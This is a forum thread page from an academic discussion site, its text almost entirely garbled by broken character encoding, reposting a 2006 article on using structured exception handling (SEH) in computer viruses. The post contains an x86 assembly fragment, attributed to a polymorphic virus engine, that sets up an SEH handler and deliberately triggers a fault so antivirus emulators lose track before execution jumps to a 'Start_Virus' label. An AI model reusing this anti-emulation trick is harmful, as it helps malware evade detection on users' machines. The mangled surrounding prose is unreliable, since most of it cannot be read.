Ó¦¡¶ÍøÂ簲ȫ·¨¡·ÒªÇó£¬×Ô2017Äê10ÔÂ1ÈÕÆð£¬Î´½øÐÐʵÃûÈÏÖ¤½«²»µÃʹÓû¥ÁªÍø¸úÌû·þÎñ¡£Îª±£ÕÏÄúµÄÕʺÅÄܹ»Õý³£Ê¹Óã¬Ç뾡¿ì¶ÔÕʺŽøÐÐÊÖ»úºÅÑéÖ¤£¬¸ÐлÄúµÄÀí½âÓëÖ§³Ö£¡

24СʱÈÈÃÅ°æ¿éÅÅÐаñ    

Znn3bq.jpeg
Сľ³æÂÛ̳-ѧÊõ¿ÆÑл¥¶¯Æ½Ì¨ » רҵѧ¿ÆÇø » ÐÅÏ¢¿Æѧ » SEH 춲¡¶¾µÄ‘ªÓÃ[תÌù]
ÉÇÍ·´óѧº£Ñó¿Æѧ½ÓÊܵ÷¼Á
31/1·µ»ØÁбí
²é¿´: 537  |  »Ø¸´: 2
Ö»¿´Â¥Ö÷ @ËûÈË ´æµµ лظ´ÌáÐÑ (ºöÂÔ) ÊÕ²Ø    ÔÚAPPÖв鿴
µ±Ç°Ö÷ÌâÒѾ­´æµµ¡£

sdlj8051

½ð³æ (ÖøÃûдÊÖ)

[½»Á÷] SEH 춲¡¶¾µÄ‘ªÓÃ[תÌù]

*?@??????b????§à???????????????????g???????????????????x?x???????¦Ê????????g
????¦Ê?????????o?P??


???ï“

SEH ????N???????????N?|?|??????????????hume?????SEH in ASM ???§à???????
??Win32 Exception handling for assembler programmers by Jeremy Gordon????????????@?
?????¡ã??


1.????N???????e???seh???

?¦Ê¦Ã????§á??????e?`???F??????????????e??????????????????????????X??
?????_??????????????????e?????N???§á??????????????????e?`??????@?????????????
??]????N????????????????X?????????????????????SEH?????????????e?§á?????F???e
?`???@?? SEH ?????§Ö????????????????????SEH ?????????????????????SEH??????
?????e???a?????????

???????????e??????????????--???????????????????????_??\?§Ö?r????
?l?F??????????N????????????????????????????????????????o ?????????? ?l?F??

??????????\?§¦r???????????????M???????a???????????????c?????????N?@??????
?????????????????@?r????????????????m??????????????????????????e???SEH?O????????
?oAVs??Emulator???@?????????????????



2.?????SEH??????????Emulator??


o????o?????????}??????????N??g???M???????a??????????????_?????b???SEH,
?????????????????????????????u????????????@????M????????????(????????)?^?m????
???????????s????????@??????????????????????§»AVs?????????e?`???a?????D?^?m??M???
????????N?????????M?????????h????????How?? ???????????a:

*??????a??????benny's polymorphic engine

start:call Set_SEH;?@????????? push offset CONTINUE
;      JMP Set_SEH
CONTINUE:mov esp, [esp+8];???????? ??????????a???r,??y??????????K???????????                          
                                       ;????????????????e,??[ESP+8]?????????f????????


push offset Start_Virus ;----_ ??Start_Virus ???????M????e????????????
ret;----  ?????????ret??????Start_Virus?????????magic?



Set_SEH:sub edx, edx            ;Edx =0

;???????????masm??????????????,???????????g?e?`
;Assume fs:nothing

push dword ptr fs:[edx];???? _EXCEPTIONAL_REGISTRATION_RECORD ?Y????????????
mov fs:[edx], esp;???b???seh ???
mov [edx],edx;????@?e???????????,???edx=0, ?????????????x?????_????????

;???Emulator ??????????????M??seh ???????(?? CONTINUE: )???^?m?
;?M???????????jmp start?????N????M?????????h???@?????????
               jmp start       ;?C


Start_Virus:    .....
.....

?????????!
???????????????]?P????]????N????N??????????o????????????¡ã?????qq:50527053,icq 72424549
email:henrynote@msn.com


*???
SEH ????¨²??V?????b????????e????(?U?)??????????????????????A????????SEH ???g????????
?????????
???@??????????????????¦Ë???W?????W???Y??,???????W?????????c??????M????
???@?e????x??????????????^?????????§Û??????@??????-???_????§Ü???³‡

--------------------------------------------------------------------------------------------------------------
?????D?d????]????????henrynote??! Henry's WorkShop :http://hackit2000.virtualave.net
Thankyou For Very Much !

[ Last edited by sdlj8051 on 2006-10-6 at 12:46 ]
»Ø¸´´ËÂ¥

» ²ÂÄãϲ»¶
1Â¥ 2006-08-23 13:52:49
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû

gph-rabbit

½ð³æ (СÓÐÃûÆø)
¿´¿´ÁË£¬Ð»Ð»¡£
»Ø¸´´ËÂ¥
2Â¥2006-12-29 01:20:26
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû

hezhi200512
3Â¥2006-12-29 09:49:07
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû
Ïà¹Ø°æ¿éÌøת ÎÒÒª¶©ÔÄÂ¥Ö÷ sdlj8051 µÄÖ÷Ìâ¸üÐÂ
31/1·µ»ØÁбí
ÆÕͨ±íÇé Áú Íà »¢ è ¸ß¼¶»Ø¸´ (¿ÉÉÏ´«¸½¼þ)
×î¾ßÈËÆøÈÈÌûÍƼö [²é¿´È«²¿] ×÷Õß »Ø/¿´ ×îºó·¢±í
[¿¼ÑÐ] 274Çóµ÷¼Á +8 ɽ°¢Âû 2026-04-07 8/400 2026-04-13 20:32 by biomen
[¿¼ÑÐ] ÉúÎïѧ308·ÖÇóµ÷¼Á£¨Ò»Ö¾Ô¸»ª¶«Ê¦´ó£©×ö¹ý·Ö×ÓʵÑé +9 ÏàÐűػá¹ââÍòÕ 2026-04-07 10/500 2026-04-13 10:20 by ¿Éµ­²»¿ÉÍü
[¿¼ÑÐ] Ò»Ö¾Ô¸0807 ÊýÒ»Ó¢Ò» 313 ÓÐûÓжþÂÖµ÷¼Á +12 emokidd 2026-04-08 13/650 2026-04-13 08:32 by lhj2009
[¿¼ÑÐ] µ÷¼Á +10 ÔÂ@163.com 2026-04-11 10/500 2026-04-12 09:14 by zhouyuwinner
[¿¼ÑÐ] 085400 328·Ö Çóµ÷¼Á +10 ιÄãÒ»¸ö´ó³È×Ó 2026-04-09 14/700 2026-04-11 19:53 by lqspecial
[¿¼ÑÐ] 283Çóµ÷¼Á 086004¿¼Ó¢¶þÊý¶þ +17 ÄǸöàà×Ó 2026-04-10 18/900 2026-04-11 16:27 by Ã÷Ô´ËʱÓÐ
[¿¼ÑÐ] 087100³õÊÔ311Çóµ÷¼Á +4 ÈÎÑÅÇÙ 2026-04-09 4/200 2026-04-11 10:33 by zhq0425
[¿¼ÑÐ] 085402ͨÐŹ¤³Ìµ÷¼Á£¬ÓÐ4Ïîѧ¿Æ¾ºÈü¹ú½±£¨µçÈü¹ú¶þ£©£¬Ë¶Ê¿Ñо¿Éúµ÷¼Á×Ô¼öÐÅ¡£ +5 mÓÀo²»vÑÔoÆúm 2026-04-09 5/250 2026-04-11 09:33 by zhq0425
[¿¼ÑÐ] 22408µ÷¼ÁÇóÖú +7 ì±12 2026-04-09 9/450 2026-04-11 09:23 by ŶŶ123
[¿¼ÑÐ] 284Çóµ÷¼Á +12 archer.. 2026-04-10 13/650 2026-04-11 08:44 by zhq0425
[¿¼ÑÐ] 287Çóµ÷¼Á +15 Fnhc 2026-04-07 21/1050 2026-04-10 19:09 by chemisry
[¿¼ÑÐ] Ò»Ö¾Ô¸¾©Çø985£¬085401£¬Óë±¾¿ÆרҵһÖ£¬µç×ÓÐÅÏ¢¹¤³Ì£¬ +4 Ñô¹â¿ªÀʵÄÄк¢ 2026-04-10 4/200 2026-04-10 18:27 by shenrf
[¿¼ÑÐ] 085800 ÄÜÔ´¶¯Á¦Çóµ÷¼Á +6 °¢biu°¡°¡°¡°¡°¡ 2026-04-10 6/300 2026-04-10 15:03 by hemengdong
[¿¼ÑÐ] µ÷¼ÁÉêÇë086000Ò»Ö¾Ô¸Î÷±±Å©ÁֿƼ¼´óѧÉúÎïÓëÒ½Ò©320·Ö-±¾¿ÆÆë³¹¤Òµ´óѧ +3 ÃÀÃÀŮʿ 2026-04-09 3/150 2026-04-10 10:31 by liuhuiying09
[¿¼ÑÐ] 085601³õÊÔ330·ÖÕÒµ÷¼Á +10 Á÷ÐÄÄ̻ưül 2026-04-09 10/500 2026-04-10 08:14 by Sammy2
[¿¼ÑÐ] ³õÊÔ·Ö332£¬Ò»Ö¾Ô¸±¨¿¼Î÷±±¹¤Òµ´óѧ£¬ +11 ¹ÊÈË?? 2026-04-09 11/550 2026-04-09 21:54 by JineShine
[¿¼ÑÐ] 085400µç×ÓÐÅÏ¢Àࣨ´¨´ó¿ØÖƹ¤³Ì£©Çóµ÷¼Á¿É¿çרҵ ÇóÀÏʦÁªÏµ +3 626776879 2026-04-08 3/150 2026-04-09 16:05 by Öí»á·É
[¿¼ÑÐ] ²ÄÁϹ¤³Ì322 +18 ¹þ¹þ¹þºðºðºð¹þ 2026-04-07 19/950 2026-04-09 10:44 by cymywx
[¿¼ÑÐ] ר˶085403£¬291·Ö£¬ÓÐÁ½Æª×¨Àû£¬Ò»¹úÒ»½± +3 ¹þ¼ªßä¹þ¼ªßä 2026-04-07 3/150 2026-04-07 18:21 by À¶ÔÆ˼Óê
[¿¼ÑÐ] ²ÄÁϵ÷¼Á +11 Ò»ÑùYWY 2026-04-07 11/550 2026-04-07 15:13 by shdgaomin
ÐÅÏ¢Ìáʾ
¹Ø±Õ
ÇëÌî´¦ÀíÒâ¼û
¹Ø±Õ